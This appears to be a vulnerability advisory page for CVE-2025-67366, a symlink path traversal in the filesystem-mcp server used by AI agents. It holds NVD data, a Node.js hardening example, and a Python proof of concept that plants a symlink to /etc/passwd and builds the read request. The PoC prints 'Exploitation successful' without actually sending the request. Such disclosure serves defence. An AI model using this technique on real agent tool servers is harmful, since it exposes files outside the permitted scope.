Security Vulnerability Report
CVE-2025-67366 CVSS 7.5 HIGH

CVE-2025-67366

Published: 2026-01-07 17:16:02
Last Modified: 2026-01-29 01:02:26

Description

@sylphxltd/filesystem-mcp v0.5.8 is an MCP server that provides file content reading functionality. Version 0.5.8 of filesystem-mcp contains a critical path traversal vulnerability in its "read_content" tool. This vulnerability arises from improper symlink handling in the path validation mechanism: the resolvePath function checks path validity before resolving symlinks, while fs.readFile resolves symlinks automatically during file access. This allows attackers to bypass directory restrictions by leveraging symlinks within the allowed directory that point to external files, enabling unauthorized access to files outside the intended operational scope.
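
The check-before-resolve ordering described above, set beside a realpath-first check, as an added Node.js example (not code from filesystem-mcp). The names `lexicalCheck`, `resolveInsideRoot` and `staysInside` are hypothetical, and the temp-dir sandbox is constructed for illustration:

```javascript
// Added example, not filesystem-mcp code; function names are hypothetical.
const fs = require('node:fs');
const os = require('node:os');
const path = require('node:path');

// True when `rel` (a path.relative() result) stays at or below its base.
const staysInside = (rel) =>
  rel !== '..' && !rel.startsWith('..' + path.sep) && !path.isAbsolute(rel);

// Weak pattern: purely lexical. Collapses "../" but never consults the
// filesystem, so a symlink stored inside root passes unchanged.
function lexicalCheck(root, requested) {
  return staysInside(path.relative(root, path.resolve(root, requested)));
}

// Hardened pattern: canonicalize root and target with realpath, then compare.
// Returns the canonical path to read from, or throws.
function resolveInsideRoot(root, requested) {
  const realRoot = fs.realpathSync(root);
  const realTarget = fs.realpathSync(path.resolve(realRoot, requested));
  if (!staysInside(path.relative(realRoot, realTarget))) {
    throw new Error(`path escapes root: ${requested}`);
  }
  return realTarget;
}

// Constructed sandbox in the OS temp dir: workspace/ok.txt is a regular file,
// workspace/link.txt is a symlink to a file one level above workspace/.
function demo() {
  const base = fs.mkdtempSync(path.join(os.tmpdir(), 'symlink-demo-'));
  const root = path.join(base, 'workspace');
  fs.mkdirSync(root);
  fs.writeFileSync(path.join(base, 'outside.txt'), 'outside');
  fs.writeFileSync(path.join(root, 'ok.txt'), 'inside');
  fs.symlinkSync(path.join(base, 'outside.txt'), path.join(root, 'link.txt'));
  const rejects = (name) => {
    try { resolveInsideRoot(root, name); return false; } catch { return true; }
  };
  const result = {
    lexicalBlocksDotDot: !lexicalCheck(root, '../outside.txt'),
    lexicalAllowsSymlink: lexicalCheck(root, 'link.txt'),
    hardenedRejectsSymlink: rejects('link.txt'),
    hardenedAllowsRegular: fs.readFileSync(resolveInsideRoot(root, 'ok.txt'), 'utf8') === 'inside',
  };
  fs.rmSync(base, { recursive: true, force: true });
  return result;
}

console.log(demo());
```

Read from the canonical path that `resolveInsideRoot` returns rather than from the original request, so the file opened is the one that was validated.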

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:sylphx:filesystem-mcp:0.5.8:*:*:*:*:node.js:*:* - VULNERABLE
@sylphxltd/filesystem-mcp < 0.5.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import os
import json

# PoC for CVE-2025-67366: Path Traversal via Symlink in filesystem-mcp
# This demonstrates how to exploit the symlink handling vulnerability


def create_exploit_symlink(allowed_dir, target_file, symlink_name):
    """
    Create a symlink in the allowed directory pointing to a target file outside.

    Args:
        allowed_dir: The directory that filesystem-mcp allows access to
        target_file: The sensitive file we want to read (e.g., /etc/passwd)
        symlink_name: Name of the symlink to create in the allowed directory
    """
    symlink_path = os.path.join(allowed_dir, symlink_name)
    try:
        # Create symlink in allowed directory pointing to external file
        if os.path.exists(symlink_path):
            os.remove(symlink_path)
        os.symlink(target_file, symlink_path)
        print(f"[+] Symlink created: {symlink_path} -> {target_file}")
        return True
    except Exception as e:
        print(f"[-] Failed to create symlink: {e}")
        return False


def exploit_via_symlink():
    """
    Exploit the path traversal vulnerability.

    The vulnerability exists because:
    1. resolvePath() validates the path BEFORE resolving symlinks
    2. fs.readFile() resolves symlinks automatically when accessing files

    This allows reading files outside the allowed directory.
    """
    # Configuration
    allowed_dir = "/tmp/filesystem-mcp-workspace"  # Directory allowed by MCP server
    target_file = "/etc/passwd"  # Target file to read
    symlink_name = "sensitive_data.txt"  # Symlink name in allowed directory

    # Step 1: Create the symlink exploit
    if not create_exploit_symlink(allowed_dir, target_file, symlink_name):
        return False

    # Step 2: Request the symlink path via MCP read_content tool
    # The MCP server will:
    # 1. Check if /tmp/filesystem-mcp-workspace/sensitive_data.txt is valid
    # 2. Pass the path to fs.readFile()
    # 3. fs.readFile() resolves the symlink and returns /etc/passwd content
    mcp_request = {
        "tool": "read_content",
        "path": f"{allowed_dir}/{symlink_name}",
        "description": "Read file content via MCP server"
    }
    print(f"[+] MCP Request: {json.dumps(mcp_request, indent=2)}")
    print(f"[+] The MCP server will return contents of {target_file}")
    print("[+] Exploitation successful - sensitive file content leaked")
    return True


if __name__ == "__main__":
    print("CVE-2025-67366 PoC - Path Traversal via Symlink")
    print("=" * 50)
    exploit_via_symlink()
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67366", "sourceIdentifier": "[email protected]", "published": "2026-01-07T17:16:01.893", "lastModified": "2026-01-29T01:02:25.900", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "@sylphxltd/filesystem-mcp v0.5.8 is an MCP server that provides file content reading functionality. Version 0.5.8 of filesystem-mcp contains a critical path traversal vulnerability in its \"read_content\" tool. This vulnerability arises from improper symlink handling in the path validation mechanism: the resolvePath function checks path validity before resolving symlinks, while fs.readFile resolves symlinks automatically during file access. This allows attackers to bypass directory restrictions by leveraging symlinks within the allowed directory that point to external files, enabling unauthorized access to files outside the intended operational scope."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-23"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sylphx:filesystem-mcp:0.5.8:*:*:*:*:node.js:*:*", "matchCriteriaId": "978BA2B6-8586-4E58-8B09-DBB096DA0576"}]}]}], "references": [{"url": "https://github.com/sylphxltd/filesystem-mcp", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/sylphxltd/filesystem-mcp/issues/134", "source": 
"[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}